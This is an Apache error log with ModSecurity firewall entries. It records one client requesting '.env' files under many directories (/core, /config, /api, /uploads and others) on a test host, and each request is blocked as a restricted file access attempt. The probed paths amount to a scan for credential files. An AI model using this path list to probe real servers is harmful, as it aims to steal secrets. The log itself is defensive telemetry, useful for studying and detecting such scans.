[Thu Jan 01 09:26:23.307322 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zwAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.307491 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zwAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.387697 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.387932 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.388090 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.468970 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.469215 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.469404 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.550068 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.550310 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.550535 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.630855 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.631100 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.631280 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_0wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.711665 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.711890 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.712037 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.792639 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.792865 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.793032 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.872942 2026] [authz_core:error] [pid 1117412] [client 54.75.202.236:53972] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env, referer: https://www.google.com/
[Thu Jan 01 09:26:23.953682 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.953912 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.954060 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_1wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.034664 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.035752 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.035956 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.115991 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.116223 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.116385 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.196900 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.197136 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.197311 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.277679 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.277912 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.278058 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_2wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.358574 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.358802 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.358967 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3AAAAAQ"], referer: https://www.google.com/
